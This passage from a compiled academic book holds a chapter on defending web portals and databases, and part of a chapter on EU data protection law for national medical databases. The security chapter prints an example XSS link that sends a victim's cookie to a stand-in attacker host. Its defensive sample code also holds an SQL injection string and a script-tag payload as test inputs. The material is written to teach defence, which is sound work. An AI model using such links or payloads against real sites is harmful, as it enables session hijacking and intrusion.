Conference (pp. 315-326), Edinburgh, Scotland, September 1999. McHugh, J., Abiteboul, S., Goldman, R., Quass, D., & Widom, J. (1997). Lore: A database management system for semistructured data. ACM SIGMOD Record, 26(3), 54-66. Milo, T., & Suciu, D. (1999). Index structures for path expressions. In Proceedings of ICDT (pp. 277-295). Salminen, A., & Tompa, F. W. (1994). PAT expressions: An algebra for text search. Acta Linguistica Hungarica, 41(1), 277-306. Schmidt, A. R., Waas, F., Kersten, M. L., Carey, M. J., Manolescu, I., & Busse, R. (2002). XMark: A benchmark for XML data management. In Proceedings of VLDB (pp. 974-985), Hong Kong, China, August 2002.
Selinger, P. G., Astrahan, M. M., Chamberlin, D., Lorie, R., & Price, T. (1979). Access path selection in a relational database management system. In Proceedings of ACM SIGMOD Conference (pp. 23-34), 1979. Srivastava, D., Al-Khalifa, S., Jagadish, H. V., Koudas, N., Patel, J. M., & Wu, Y. (2002). Structural joins: A primitive for efficient XML query pattern matching. In Proceedings of ICDE Conference (pp. 141-152), San Jose, CA, February 26-March 1, 2002. Wang, G., & Liu, M. (2003). Query processing and optimization for regular path expressions. In Proceedings of CAiSE Conference (pp. 30-45), Klagenfurt, Austria, June16-18, 2003. Zhang, C., Naughton, J. F., DeWitt, D. J., Luo, Q., & Lohman, G. M. (2001). On supporting containment queries in relational database management systems. In Proceedings of ACM SIGMOD Conference (pp. 425-436), Santa Barbara, CA, USA, 2001.
This work was previously published in International Journal of Information Technology and Web Engineering, Vol. 1, Issue 4, edited by G. Alkhatib and Dr. Rine, pp. 49-67, copyright 2006 by IGI Publishing (an imprint of IGI Global).
Chapter 7.5
Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals
Theodoros Evdoridis, University of the Aegean, Greece
Theodoros Tzouramanis, University of the Aegean, Greece
INTRODUCTION
The issue of the escalation of security breaches in the field of Web systems has caused a great deal of disquiet in the computer security community. The majority of recorded security violations against legally sensitive portals have raised numerous issues both at an individual and at an organizational level. Furthermore, given that no one is willing to pursue security through the isolation of the targeted systems, it is understood that security countermeasures must be conceived and applied without altering the current operational scheme. The economic and social reasons for using the Internet are still far too compelling (Schneier, 2005). Looking in this direction, the complexity as well as the urgency of the present situation has attracted specialists from
other scientific sectors, such as psychology and law, who contribute to the search for an integrated multilevel solution required in this context.
BACKGROUND
The issue of making computers that host legally sensitive information secure has been a major concern of the computer security community over the years (Computerworld.com, 2003). A group of experts argue that security features should not be built into the Web portal’s or the Web database’s infrastructure, but rather added on to it according to emerging needs, because building them in would dramatically increase the system’s complexity, rendering it cumbersome to debug, to maintain, and to further develop. Another view holds that a mixed solution must be adopted: routine tasks like access control must be handled in the database, but because new threats emerge daily, add-on security solutions should be applied when considered necessary.
MAIN THRUST
It is obvious that in order to block any possible attack (see, for example, the section on “Security Threats in Web-Powered Databases and Web Portals,” which also appears in this publication), a corresponding multilevel countermeasure policy must be followed. Below, the most common security countermeasures for these types of attacks are reviewed.
Network-Level Countermeasures
To prevent all possible attacks performed on the network layer of a legally sensitive Web portal, security mechanisms must be implemented (Microsoft Corporation, 2003). Primary solutions against these types of attacks are cryptographic protocols, such as SSL or TLS, which undertake the task of encrypting communication data from the client to the server, and vice versa.
The usage of these protocols guarantees that the data are revealed only to authorized parties, thus ensuring information confidentiality. Furthermore, by adopting IPsec, which is an obligatory part of IPv6 (Wikipedia, 2006), additional security mechanisms that ensure authentication, data confidentiality, and message integrity between communicating parties are incorporated into the security scheme. As a result, sniffing attacks, while successful in capturing the data, fail to reach their goal, as the captured data are in an encrypted form that cannot be used alone to produce their decrypted version. As for tampering, the message authentication codes included in IPsec can be used to discover whether the received message is really the original one sent by the legitimate sender (Tipton & Krause, 2004). In addition, the message authentication code included in the above cryptographic protocols, by using parameters related to the current time, assures that no prior connection can be used to forge a new one, thus preventing any session hijacking attempt. Finally, to successfully counter the spoofing threat, appropriately configured access control mechanisms such as firewalls, both network and application ones, are needed. The first category, known as packet filtering routers, is responsible for reading packet headers and deciding, according to a given access control list that expresses the security policy that needs to be enforced, whether the packet should be forwarded or blocked. One of the most commonly encountered application-level firewalls is the application-level gateway. These systems serve as proxy servers and act as a relay for application-level traffic.

Figure 1. A firewall-protected Local Area Network containing the Web portal assets (components shown: the Internet, a packet filtering router, an application-level gateway, the Web server, and the database server)
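As a minimal illustration of the transport-layer protection described above, the following sketch opens a TLS-protected connection using the Python standard library. It is not taken from any system discussed in this article; the host name is a hypothetical placeholder, and in practice the same options (certificate verification and host name checking) would simply be enabled in the client and server software rather than hand-coded.

import socket
import ssl

# Hypothetical portal host; replace with the real server name.
PORTAL_HOST = "portal.example.org"
PORTAL_PORT = 443

# Client-side TLS context with certificate verification and host name
# checking enabled (the defaults of create_default_context).
context = ssl.create_default_context()

with socket.create_connection((PORTAL_HOST, PORTAL_PORT)) as raw_sock:
    # Wrap the TCP socket so that all application data is encrypted and
    # the server's identity is verified against its certificate.
    with context.wrap_socket(raw_sock, server_hostname=PORTAL_HOST) as tls_sock:
        print("Negotiated protocol:", tls_sock.version())  # e.g. 'TLSv1.3'
        tls_sock.sendall(b"GET / HTTP/1.0\r\nHost: portal.example.org\r\n\r\n")
        print(tls_sock.recv(1024))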
Host-Level Countermeasures
For defence against these kinds of threats, all core components of the Web portal must run the latest stable versions of all software components that they utilise, including service packs, security updates, and patches that fix bugs or render the programs more reliable. Additionally, specialised virus detection software should be active at all times, looking for the presence of already known viruses on the hosts and the network. Apart from this, all default accounts on operating systems and servers should be deactivated, and all external connections to the intranet where the Web portal’s hosts lie must be forced to pass through network and application level firewalls (Oppliger, 2002). Proxy server usage is also recommended because this network service forces all connections and requests to be made against a third computer system that, in turn, performs requests on behalf of the client to the default server. This schema adds another security layer because information, such as the IP addresses of the hosts, is hidden from the client, and direct access to the hosts is prevented. In conclusion, intrusion detection systems must be adopted in order to detect all types of malicious network traffic and computer usage that cannot be detected by a conventional firewall (Wikipedia.org, 2006).
Application-Level Countermeasures
To be able to counter attacks performed against the application software, developers must pay heed when designing the interfaces that are going to be used for user-submitted data (Microsoft Corporation, 2003; Splain, 2002). To prevent the buffer overflow threat from coming to pass, data validation regarding its size must take place. To prevent SQL injection attacks at the application level, the routines for constructing dynamic SQL statements must be modified to exclude special characters such as “;”, and the application should connect to the database with least-required privileges (Breidenbach, 2002; Su & Wassermann, 2006). Besides, when HTML forms are used for authentication, data including usernames, passwords, and cookies should be transmitted via SSL in encrypted form as a single entity. This technique prevents credential disclosure and cookie replay attacks, because the attacker would not be able to sniff the cookie out, as all traffic is encrypted. Likewise, client software and operating systems need to be kept up to date to avoid any vital information leakage on this side. Moreover, software developers should embed password evaluation routines in the application, forcing users to use passwords that comply with minimum-security standards. Finally, in order to protect against cross-site scripting attacks, site owners must never trust user input and must always filter metacharacters; a brief illustrative sketch is given at the end of this section. This will eliminate the majority of XSS attacks. Converting “<”, “>”, and other possibly malicious characters to their HTML equivalents is also suggested when it comes to script output (Cgisecurity.com, 2003). Figure 2 depicts a malicious link specially crafted to take advantage of the problematic site “subject_to_xss_site.com” and gain access to the victim’s cookie. When employing character conversion on specific characters, the once malicious link is no longer a threat because it cannot be correctly parsed to produce the expected results for the attacker.
Figure 2. A malicious link http://subject_to_xss_site.com?name=News&file=article&sid=1&optionbox= [‘http://malicious_site.com/steal.cgi?’+document.cookie]
Figure 3. A malicious link turned into a harmless one using special characters conversion http://subject_to_xss_site.com%3Fname%3DNews%26file%3Darticle%26sid%3D1%26optionbox%3D %5B%27http%3A//malicious_site.com/steal.cgi%3F%27%2Bdocument.cookie%5D
In any circumstances, XSS security holes can be damaging and costly to a business if abused. Often, attackers will disclose these holes to the public, which can erode customer and public confidence in the security and privacy of the organisation’s site (Securitydocs, 2005). On the other hand, at an individual level, the most effective way of protecting against this type of attack is to instruct the authorized users to follow links only from the main Web site they are viewing. If a user visits a site that links to the BBC, for instance, instead of clicking on it, it would be wiser to visit the BBC’s main site and use its search engine to access the desired content. This will probably eliminate 90% of the problem. However, sometimes XSS can be executed automatically when a user opens an e-mail, an e-mail attachment, or reads a guestbook or bulletin board post. If this is the case, and the sender or the poster of the item that is about to be processed is unknown, users should be very careful. One of the best ways to guard oneself against this scenario is to deactivate JavaScript or VBScript in the browser settings.
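The sketch promised above illustrates, under stated assumptions, the two application-level measures just discussed: parameterised SQL statements and HTML output encoding. It uses only the Python standard library; the table, column, and function names are hypothetical and do not correspond to any particular portal.

import html
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
conn.execute("INSERT INTO articles (title) VALUES ('Hello <world>')")

def find_articles(user_supplied_title):
    # Parameterised query: the driver passes the value separately from the
    # SQL text, so characters such as ' or ; cannot change the statement.
    cursor = conn.execute(
        "SELECT id, title FROM articles WHERE title = ?",
        (user_supplied_title,),
    )
    return cursor.fetchall()

def render_title(title):
    # Output encoding: convert <, >, &, and quotes to HTML entities so that
    # stored or reflected markup cannot execute as script in the browser.
    return "<h1>%s</h1>" % html.escape(title)

# A classic injection attempt simply matches no rows instead of altering the query.
print(find_articles("x' OR '1'='1"))
print(render_title('<script>alert("xss")</script>'))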
Physical and Insider Countermeasures
Protecting the facility and its assets from unauthorized access, whether forced or covert, is an
important part of any security system (WBDG.org, 2005). Some measures to consider include compound or facility access control, fences, guards, remote controlled gates, and forced-entry ballistic-resistant (FE-BR) doors and windows. Moreover, perimeter intrusion detection systems, as well as alarms and detection devices (motion, acoustic, infrared), must be included in the security scheme. Finally, physical access to areas of the facility should be electronically supported using fingerprints, biometrics, and smart cards, leaving digital trails in appropriate log files when a successful or unsuccessful attempt to enter the area takes place. With respect to insider attacks, successful countermeasures include the implementation and application of personnel reliability programs (Tipton & Krause, 2004) and performing background checks upon recruiting. Additionally, the appropriate management of employees, combined with the adoption of a well-placed code of ethics with significant consequences for disregarding it, may keep employees satisfied or cautious enough about considering any malicious actions. Moreover, personnel access should be controlled and granted to areas of the facility that are part of their duties, and activity must be monitored by specialized surveillance systems.

Figure 4. A smart card used for health insurance in France

FUTURE TRENDS
More attacks against financial institutions are expected in the future, as criminals look for new ways to commit fraud. We also expect to see more insider attacks with a criminal profit motive. Already, most of the targeted attacks—as opposed to attacks of opportunity—originate from inside the attacked organization’s network. Additionally, more politically motivated hacking attempts are expected, whether against countries, companies in “political” industries (petrochemicals, pharmaceuticals, etc.), or political organizations (Schneier, 2005). It is to be noted that another group of experts holds a different opinion. According to their beliefs, in the years to come, program vulnerabilities will be in decline and so will security breaches. It is believed that applications will become smaller and simpler because they will rely on rock-solid quality software components that will be used by all programs. Web applications and Web portals will also benefit from this philosophy, and as a result, a non-negligible number of threats will all but evaporate because the corresponding security vulnerabilities will no longer exist.

CONCLUSION
Aiming at successfully preventing and dealing with the threats that compromise a legally sensitive Web portal’s operation is without doubt a nontrivial task. Information systems security experts, alongside Web portal specialists and experts from other scientific fields, ought to cooperate and provide adaptable, adjustable, and appropriate countermeasures that can efficiently respond to the eventuality of any potential challenge. The latter must be achieved in order to ensure that legally sensitive Web-powered databases and Web portals will flourish, prosper, and drift along in their progress track.
REFERENCES
Breidenbach, B. (2002). Guarding your Web site against SQL injection attacks (E-book). Apress.
Cgisecurity.com. (2003). Cross site scripting questions and answers. Retrieved January 8, 2007, from http://www.cgisecurity.com/articles/xss-faq.shtml
Computerworld.com. (2003). The future of security. Retrieved January 8, 2007, from http://www.computerworld.com/printthis/2003/0,4814,88646,00.html
Microsoft Corporation. (2003). Improving Web application security: Threats and countermeasures. Microsoft Press.
Oppliger, R. (2002). Security technologies for the World Wide Web (2nd ed.). Artech House.
Schneier, B. (2005). Attack trends 2004-2005. Retrieved January 8, 2007, from http://www.
Securitydocs. (2005). Cross site scripting (XSS) FAQ. Retrieved January 8, 2007, from http://www.securitydocs.com/library/3472
Splain, S. (2002). Testing Web security: Assessing the security of Web sites and applications. John Wiley.
Su, Z., & Wassermann, G. (2006). The essence of command injection attacks in Web applications. In Proceedings of the 33rd Annual Symposium on Principles of Programming Languages (POPL’06).
Tipton, H. F., & Krause, M. (2004). Information security management handbook (5th ed.). CRC Press.
WBDG.org. (2005). Provide security for building occupants and assets. Retrieved January 8, 2007, from http://www.wbdg.org/design/provide_security.php
Wikipedia.org. (2006). Retrieved January 8, 2007, from http://en.wikipedia.org/wiki/Main_Page

KEY TERMS
Code of Ethics: A formal statement of the company’s values on ethics and social issues. Some set out general principles about the company’s beliefs on matters such as quality, employees, or the environment. Others set out the procedures to be used in specific ethical situations, such as conflicts of interest or the acceptance of gifts.
Cookie: A small packet of information stored on users’ computers by Web sites in order to uniquely identify the user across multiple sessions.
Database: An organized collection of data (records) that are stored in a computer in a systematic way, so that a computer program can consult it to answer questions. The database model in most common use today is the relational model, which represents all information in the form of multiple related tables, with each one consisting of rows and columns.
Database Server: A computer program that provides database services to other computer programs or computers, as defined by the client-server model. The term may also refer to a computer dedicated to running such a program.
Firewall: A piece of hardware or software which functions in a networked environment to prevent the escape of communication forbidden by the security policy.
IP Security (IPsec): A standard for securing Internet Protocol (IP) communications by encrypting or authenticating all IP packets. IPsec provides security at the network layer.
Secure Sockets Layer (SSL): A cryptographic protocol which provides secure communications on the Internet.
Transport Layer Security (TLS): SSL’s successor. Although there are slight differences between SSL 3.0 and TLS 1.0, the protocols are substantially the same.
Web Server: A computer program hosted in a computer that is responsible for accepting HTTP requests from clients, which are known as Web browsers, and serving them Web pages, which are usually HTML documents.
This work was previously published in Encyclopedia of Portal Technologies and Applications, edited by A. Tatnall, pp. 188-191, copyright 2007 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 7.6
Compiling Medical Data into National Medical Databases:
Legitimate Practice or Data Protection Concern?
Boštjan Berčič, Institute for Economics, Law and Informatics, Ljubljana, Slovenia
Carlisle George, Middlesex University, UK
ABSTRACT
In recent years, various national medical databases have been set up in the EU from disparate local databases and file systems. Medical records contain personal data and are as such protected by EU and member states’ legislation. Medical data, in addition to being personal data, is also defined in the EU legislation as being especially sensitive and warrants special measures to protect it. It therefore follows that various legal issues and concerns arise in connection with these processes. Such issues relate to the merits of compiling a nationwide database, deciding on who has access to such a database, legitimate uses of medical data held, protection of medical data, and subject access rights amongst others.
This chapter examines some of these issues and argues that such databases are inevitable due to technological change; however there are major legal and information security caveats that have to be addressed. Many of these caveats have not yet been resolved satisfactorily, hence making medical databases that already exist problematic.
INTRODUCTION
Medical data consists of information used in the provision of healthcare such as observations of patients (e.g., test results), medical histories, symptoms, prescriptions, and treatments. It is essential that such data are properly recorded and accessible in order to support the care of
patients. Specifically, medical data can be used for various purposes such as to: create a historical record of a patient, provide a reference for future treatment, provide a communication mechanism among different medical professionals, anticipate future health problems, provide a legal record, and support clinical research (Shortliffe & Barnett, 2001). The use of information technology in healthcare has created new possibilities including the digitisation of medical data (from passive paperbased patient records). An important consequence of this is the creation of the electronic health record (EHR), which can be defined as: a longitudinal electronic record of patient health information generated by one or more encounters in any care delivery setting. Included in this information are patient demographics, progress notes, problems, medications, vital signs, past medical history, immunizations, laboratory data and radiology reports. (Healthcare Information and Management Systems Society, 2007) EHRs are generally stored in a database system and their contents can vary according to the specific national legal framework under which they are regulated. They provide many advantages over traditional paper-based patient records leading to an improved quality of healthcare (by facilitating new methods of delivering healthcare and better data management). Some benefits of EHRs include: non-exclusive, continuous and multiple access to a patient’s data; improved accuracy, reliability and integrity of data; standardised data record formats; ease of data access; ease of data integration; and stronger protections for confidentiality and security (Hunter, 2002). Traditionally, EHRs have been stored in database systems that were locally developed, maintained and stored by organisations (such as hospitals, doctors’ surgeries and other healthcare providers) in order to improve their quality
of service. The advent of new information and communication technologies, improved networks and the need for new data processing capabilities (e.g., demographic healthcare studies) have resulted in the creation of (or attempt to create) national medical databases. For example in June 2002, the United Kingdom (UK) Government (Department of Health) published a National Strategic Programme for the use of information technology in the National Health Service (NHS). Amongst key elements outlined in the strategy was the delivery of core national services that can be used throughout the NHS such as an electronic health record service (having core data and reference links to local medical databases) accessible nationally for out of hours reference, (Department of Health, 2002). A national medical database can be described as the aggregation of various disparate local medical registries/databases compiled at the national level. Such databases are characterised by their extensive coverage/storage of medical data, both in terms of their content (they integrate different medical databases) and geographic coverage (they integrate data from an entire country). They can lead to improved healthcare services coordinated (and planned) at a national level. Improvements are due to factors such as: the provision of medical information (e.g., for an emergency) anytime and anywhere, nationally standardised medical records generally leading to an improved quality of medical data, access to a large volume of medical data for clinical research, the ability to undergo epidemiology research, the central control of medical data, the ability to plan services for populations, and better management of scarce national medical resources (see Department of Health, 2003). The nature of national medical databases (compared to local databases), especially the fact that they are accessible nationally raises greater legal concerns regarding the protection (and potential unauthorised disclosure and use) of medical data. This is especially poignant for
national medical databases created and maintained by non-governmental organisations (e.g., private medical companies). In the UK, in order to address predicted future healthcare trends, a national medical database appears to be a necessity. In 2006 a royal society report on digital healthcare (Royal Society, 2006) identified various predicted changes (driven and enabled by technology) in the UK healthcare system in 10-15 years. These predicted changes included: an increase in patient-focused service giving patients more choice in how, where and when treatment is received; a change from hospital care to more primary and community care resulting in advantages such as decrease risk of infections in a large institution; the integration of healthcare with other services (e.g., social care) resulting in a multi-organisational service; and an increase in the number of healthcare service providers, including from the private sector. These changes will require the need for patients’ medical data to be accessed anywhere, anytime and ‘ondemand’. Further, medical data will need to be shared amongst healthcare workers both within and across (public and private sector) organisations. Such developments will essentially require a national medical database in order to coordinate and integrate medical information from various sources. This chapter focuses on the phenomenon of national medical databases and some data protection concerns (including related legal issues of privacy and confidentiality) that arise from the creation and the operation of such databases. The chapter first briefly discusses examples of national medical databases in two European Union member states namely the United Kingdom (UK) and Slovenia. It then discusses aspects of the European Union (EU) Data Protection Directive 95/46/EC (the basis of EU Member States’ data protection legislation) such as what constitutes personal data, data protection principles, obligations of data controllers, and rights of data subjects. Next,
some legal concerns specific to national medical databases are discussed with a view to suggesting possible solutions for addressing these concerns. The chapter finally concludes by looking at the balance between the benefits and risks associated with national medical databases.
THE CASES OF THE UK AND SLOVENIA In the UK, under the 2002 National Strategic Programme for the use of information technology in the National Health Service (NHS), a national medical database is being set up (at the time of writing) that will store the information (medical records) of up to 50 million patients in England. These records will include demographic information (e.g., date of birth, name and address) and medical data (e.g., NHS number, allergies, adverse drug reactions, test results, medication, past or continuing treatment details), (NHS Factsheet, 2005). There is the potential in the future to include other categories of medical data such as genetic data, psychiatric records, and others. Implementation of this system began in 2007 through an “early adopter” programme involving general practitioner practices in four primary care trusts. “Early adopters” are required to create summary care records (SCR), which will form part of the care records service (national medical database) in England. The SCR is formed by the uploading of a patient’s current medication, known allergies, and adverse reactions into a database. There has been much debate over issues such as who will have access to such records, how will the privacy of patients be preserved, and how will the system be protected amongst others. Further there has been speculation about whether the designed system is fully compatible with internationally binding agreements (e.g., Council of Europe recommendation no R(97)5 on the protection of medical data, to which Britain is a signatory or the
Declaration of Helsinki on ethical principles for medical research, Anderson, 2007). However, the UK Department of Health has proposed various practices for the implementation and operation of this new national healthcare system. These practices (discussed further on) have been approved by the UK Information Commissioner (who oversees the implementation of the Data Protection Act 1998) as being consistent with the requirements of the (Data Protection) Act (Information Commissioner’s Office, 2007). In Slovenia, around 50 different medical databases are interconnectable on the national level by reference to some unique identifier (mainly national identification number (NINo), but also social security number and healthcare card number) and held by a few governmental agencies (mainly by the national Institute for the Preservation of Health). The collection and processing of these data is regulated by the 2000 Healthcare Databases Act. At present, no single physically integrated (compiled) national medical database exists, but a variety of medical data on individuals is obtainable if data in the various databases (within departments and agencies) are combined/collated. If a physically integrated national medical database existed compiled data may be easily available to non-clinical personnel such as clerks, which raises concern. Most data compiled at the national level (from various databases) are in the identifiable/personal form, with some data anonymised (for example drug users, HIV positives, etc.). Data are collected mainly for research and statistical purposes, which would in theory allow anonymisation, however, some databases are used for other purposes and have to be in identifiable/personal form. A database of contractable diseases, for example (vaccinations, rabies), is used in the prevention of epidemics and pandemics and is usually retained in an identifiable/personal form in other to allow linking (with other databases). Two major data protection concerns are whether it would be better to have all data in an anonymised form (since such data is
used mainly for statistics which only cares about aggregates) and how best to prevent misuse of data by unscrupulous employees who can sometimes easily link data from various databases with reference to the same unique identifier.
PERSONAL DATA AND DATA PROTECTION LEGISLATION Directive 95/46/EC of the European Parliament and of the Council of 24 October 1995 (thereafter referred to as the Directive) sets out the legislative framework (variously implemented in the national legislation of EU member states e.g., the UK Data Protection Act 1998 and Slovenian Personal Data Protection Act 1999) for the protection of individuals with regard to the processing of personal data and on the free movement of such data. Article 2 of the Directive defines “personal data” as “any information relating to an identified or identifiable natural person (‘data subject’) where an identifiable person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity.” The means of identifying should not cause excessive costs, effort and should not take much time. The given definition of personal data is very broad, so that when used, almost any information can qualify as personal data (the criteria are met if it applies to an identifiable individual, for example: the mere fact that an individual is wearing a blue shirt can constitute an item of personal data). On the other hand, this definition is semantically also rather vague. Even if we accept the fact that content-wise every item of information can be considered personal data provided it can be related to an individual, the directive’s definition is still rather vague structurally (since it is not always clear what kind of internal structure every data record has to have to be considered personal data). In relational database theory, for
example, a record structurally consists of two parts: (1) a unique identifier (primary key) of the record viz. entity under consideration and (2) one or several items of data related to it. The directive’s definition does not define personal data in this way, hence it is not always clear, for example, whether a unique identifier of a person (such as national identification number referred to as NINo) already constitutes personal data, whether only items of data related to this unique identifier would be considered personal data (for example the fact that someone lives on Oxford Street) or whether only a record that meets both criteria, inclusion of the unique identifier and data related to it would be considered personal data (for example the NINo of a person plus the fact that this person lives on Oxford Street). In the UK case of Durant v Financial Services Authority (2003 EWCA Civ 1746), the Court of Appeal issued a landmark ruling narrowing the interpretation of what makes data ‘personal’ (within the meaning of personal data under the EU directive and UK Data Protection Act 1998). The Court ruled that personal data is information which: is biographical in a significant sense; has to have the individual as its focus; and has to affect an individual’s privacy whether in his personal family life, business or professional activity. At the time of writing, this case is currently being appealed before the European Court of Human Rights citing a breach of Article Eight of the European Convention of Human Rights (i.e., the right to privacy). The question of what constitutes personal data is not as trivial as it seems, since the Directive only applies to personal data, which is recorded as part of a filing system (Article 3(1)). Hence another very important question is the question of what constitutes a personal data filing system (which, following the directive’s definition, is: “any structured set of personal data which are
accessible according to specific criteria, whether centralized, decentralized or dispersed on a functional or geographical basis.”), and, cascading on this, another very important question, that of what constitutes processing of personal data (which, following the Directive’s definition, is: “any operation or set of operations which is performed upon personal data, whether or not by automatic means, such as collection, recording, organization, storage, adaptation or alteration, retrieval, consultation, use, disclosure by transmission, dissemination or otherwise making available, alignment or combination, blocking, erasure or destruction”). This structurally rather imprecise and all-inclusive definition of personal data in the end determines whether the Directive can be applied to a particular case involving collected data. In the context of national medical databases, data stored within them will certainly constitute personal data and as such will fall under the legal framework of member states’ data protection legislation (implemented from the Directive), notwithstanding the differences in these implementations. In any data processing context, there exists a data controller and one or more data processors. The Directive defines a “data controller” as a “natural or legal person, public authority, agency or any other body which alone or jointly with others determines the purposes and means of the processing of personal data” and a “data processor” as “any other body which processes personal data on behalf of the controller.” Article 6(1) of the Directive states five general principles relating to data quality, namely that data must be:

• Processed fairly and lawfully;
• Collected for specified, explicit and legitimate purposes and only processed for those purposes;
• Adequate, relevant and not excessive;
• Accurate and kept up to date;
• Kept in a form which permits identification of data subjects for no longer than is necessary for the purposes for which the data were collected or for which they are further processed.
Article 25 of the Directive also outlines an important principle related to the transfer of data to third countries—namely that member states shall provide that the transfer to a third country of personal data which are undergoing processing or are intended for processing after transfer, may take place only if the third country in question ensures an adequate level of protection.
OBLIGATIONS OF DATA CONTROLLERS AND RIGHTS OF DATA SUBJECTS

When is Processing Legitimate?
According to Article 7 of the Directive, personal data may be processed only if:

• The data subject has unambiguously given his consent; or
• Processing is necessary for the performance of a contract to which the data subject is party; or
• Processing is necessary for compliance with a legal obligation; or
• Processing is necessary in order to protect the vital interests of the data subject; or
• Processing is necessary for the performance of a task carried out in the public interest; or
• Processing is necessary for the purposes of the legitimate interests pursued by the controller (or authorised third parties), subject to the rights of data subjects (e.g., privacy) under Article 1(1).
The processing of personal data on the local level (e.g., primary care, hospitals etc.) usually falls (has to fall) within one of these categories. In Slovenia, the 2000 Healthcare Databases Act governs compilation of various medical databases on the national level. In the absence of such special law there might be other legal titles by reference to which data compilation could be legal, for example, a contract between an individual and a data controller (e.g., a hospital) which would allow the data controller to process personal data because it is necessary for the performance of a contract. However, a contract between the data subject and the data controller at the local level does not automatically empower local data controllers to transfer data to the national level (e.g., national medical database). Another legal title according to which such transfer would be deemed legal is for example the case of transferring data to a national Centre for Disease Control and Prevention (i.e., performance of a task carried out in the public interest). In the absence of other legal titles, data could be compiled at the national level on the basis of data subjects’ consent. A data controller of a national medical database could, for example, obtain such consents (e.g., in written form) by turning directly to subjects whose data it obtained from a local level or with the collection of data from the data subjects themselves. Different countries regulate this differently. In Slovenia for example, personal data in the public sector may be processed only if the processing of personal data is provided for by statute. If no such statute exists, the public sector is not allowed to extract consent from data subjects to collect categories of data, whose collection was not foreseen by the law. This particular provision seeks to ensure that state administration and organs would not impinge on the privacy of its citizens by ad hoc collection of various categories of data and compilation of databases not foreseen by the legislator. However, different statutes may provide that certain personal data may be processed by the administration on
the basis of the personal consent of the individual and in such cases, and only in such cases, can the state apparatus set about collecting data by consent. Other countries (such as the UK) do not have such provisions in their data protection legislation since the Directive does not specifically require it.
Medical Data as a Special Category of Data
Medical data (along with data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, trade-union membership, and data concerning sex life, but interestingly not financial data) is especially sensitive according to the Directive. It is forbidden to process it, except where (Article 8):

• The data subject has given his explicit consent,
• Processing is necessary for the purposes of carrying out the obligations and specific rights of the controller in the field of employment law,
• Processing is necessary to protect the vital interests of the data subject or of another person where the data subject is physically or legally incapable of giving his consent,
• The processing relates to data which are manifestly made public by the data subject or is necessary for the establishment, exercise or defence of legal claims.
Information to be Given to Data Subject
The Directive demands that when collecting data from a data subject (Article 10), or obtaining the data from another source which is not the data subject (Article 11(1)), the controller must provide the data subject with at least the following information related to the processing of his or her data:

• The identity of the controller,
• The purposes of the processing,
• The categories of data concerned,
• The recipients or categories of recipients,
• The existence of the right of access to and the right to rectify the data concerning him.
If a national medical database is compiled, data would probably not come directly from the data subjects themselves, but rather from the providers of primary health services such as clinics and hospitals (as is the case with “early adopters” in the UK) . Whenever such data is compiled on the national level, but no later than the time when the data are first disclosed to third parties, data subjects would have to be informed about it. The recipients of data would also have to be disclosed, which are not always obvious in advance and transfers to such recipients would always need to occur according to an explicit legal title. This provision is often violated in practice as various data collectors do not present all of the information necessary to data subjects. Hence, the identities of data controllers are often not disclosed (the data controller's data processor is often enlisted instead, for example, a hospital carrying out clinical research instead of the company on whose behalf the research is carried out); some recipients of the data are not disclosed (in the above case, the ultimate recipient could be the national medical database where the data would eventually resurface); and the purposes of processing are sometimes too vaguely defined (such a broad, all encompassing purpose would for example be processing for the purposes of national healthcare, which is void of specific meaning).
Right of Access
According to the Directive, an individual whose data are being processed has the right (subject to some exceptions) to obtain from the controller (Article 12):
• Confirmation as to whether or not data relating to him are being processed and the recipients or categories of recipients to whom the data are disclosed,
• Communication to him of the data undergoing processing and of any available information as to their source,
• Appropriate rectification, erasure or blocking of data the processing of which does not comply with the provisions of this directive,
• Notification to third parties to whom the data have been disclosed of any rectification, erasure or blocking carried out unless this proves impossible or involves a disproportionate effort.

European member states have codified this article differently in their respective national legislation: some have prescribed a duty to notify data subjects of possible receivers of data relating to them; others go as far as prescribing compulsory recording of each data transfer for specified periods of time. In Slovenia, for example, every transfer of personal data to third parties (e.g., local authorities, police) has to be recorded and retained for some period of time (5 years) in case the subject exercises his right to obtain this information. This recording of transfers puts some burden on the data controller, but there are signs that it effectively controls data paths and prevents the leaking of data. Each such transfer must be adducible from one of the titles cited in Article 7 of the Directive, and this title must be sought prior to it and recorded alongside the receiver of data. Data controllers are less likely to pass on data if they must record such transfers and search for their justification in advance. In the case of creating a national medical database, local health service providers would have to check whether there is a legal instrument to authorise the transfer of such data to the national level (e.g., a statute mandating such transfer to a national medical database) and in the absence of such a legal instrument would have to deny any transfer request. Once at the national level, each transfer from the compiled national medical database should also be recorded to enable post screening of transactions.
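As a purely illustrative sketch of the recording obligation just described, the following fragment keeps a register of disclosures together with the Article 7 ground invoked for each one. All names are hypothetical, the grounds are abbreviated labels rather than legal text, and the five-year retention figure simply follows the Slovenian example mentioned above; nothing here reflects an actual national system.

from dataclasses import dataclass
from datetime import datetime, timedelta

# Abbreviated labels for the legal grounds of Article 7 of Directive 95/46/EC.
ARTICLE_7_GROUNDS = {
    "consent", "contract", "legal_obligation",
    "vital_interests", "public_interest", "legitimate_interests",
}

RETENTION = timedelta(days=5 * 365)  # five-year retention, as in the Slovenian example

@dataclass
class TransferRecord:
    record_id: str      # identifier of the medical record transferred
    recipient: str      # third party receiving the data
    legal_ground: str   # Article 7 ground justifying the transfer
    timestamp: datetime

class TransferRegister:
    def __init__(self):
        self._log = []  # list of TransferRecord entries

    def record_transfer(self, record_id, recipient, legal_ground):
        # A transfer without a recognised legal ground must be refused.
        if legal_ground not in ARTICLE_7_GROUNDS:
            raise PermissionError("no legal ground for transfer; request denied")
        self._log.append(TransferRecord(record_id, recipient, legal_ground, datetime.now()))

    def disclosures_for(self, record_id):
        # Supports the data subject's right to learn who received their data.
        cutoff = datetime.now() - RETENTION
        return [t for t in self._log if t.record_id == record_id and t.timestamp >= cutoff]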
Right to Object
Where processing is necessary for the performance of a task carried out in the public interest or for the purposes of the legitimate interests pursued by the controller (Article 7), a data subject has the right (under Article 14) to object (subject to compelling legitimate grounds) to the processing of data related to him unless such processing is provided for by national legislation.
Automated Individual Decisions
